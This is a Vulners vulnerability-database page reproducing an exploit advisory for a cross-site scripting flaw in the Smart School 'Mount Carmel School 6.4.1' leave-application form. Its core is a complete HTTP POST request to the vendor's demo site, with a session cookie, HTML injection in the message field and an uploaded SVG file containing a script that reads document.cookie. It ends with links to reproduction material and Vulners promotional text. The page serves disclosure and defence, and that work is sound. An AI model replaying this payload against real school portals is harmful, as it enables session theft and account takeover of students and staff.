Vulners
Lucene search
2023 Mount Carmel School 6.4.1 Cross Site Scripting
`## Title: 2023-Mount-Carmel-School-6.4.1 XSS-Reflected - User Interaction
## Author: nu11secur1ty
## Date: 10/14/2023
## Vendor: https://smart-school.in/
## Software: https://demo.smart-school.in/site/userlogin#
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected
## Description:
The user can manipulate the system by injecting an HTML code into the
system without any restriction.
The function apply_leave is not sanitizing correctly. This could allow
the user to inject this
application by using HTML or Java Script with very malicious purposes etc...
STATUS: HIGH- Vulnerability
[+]Exploit:
```HTML
POST /user/apply_leave/add HTTP/1.1
Host: demo.smart-school.in
Cookie: ci_session=495u2fpup87iml75p4us2uuqgqkpsof9
Content-Length: 1492
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary5wuzslDN9siOCW0K
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132
Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.smart-school.in
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.smart-school.in/user/apply_leave
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="homework_id"
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="apply_date"
10/14/2023
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="from_date"
09/27/2023
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="to_date"
09/29/2023
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="leave_id"
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="message"
<a href="https://www.youtube.com/watch?v=yPuC4Cy2ZuI" target="_blank"
rel="noopener nofollow ugc">
<img src="https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/chalga-tochilka.gif"
style="border:1px solid black;max-width:100%;" alt="Photo of Byron
Bay, one of Australia's best beaches!">
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="files[]"; filename="kurec.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
------WebKitFormBoundary5wuzslDN9siOCW0K--
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/smart-school.in/2023/Mount-Carmel-School-6.4.1)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/10/2023-mount-carmel-school-641-xss.html)
## Time spent:
00:37:00
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Oct 2023 00:00Current
7.1High risk
Vulners AI Score7.1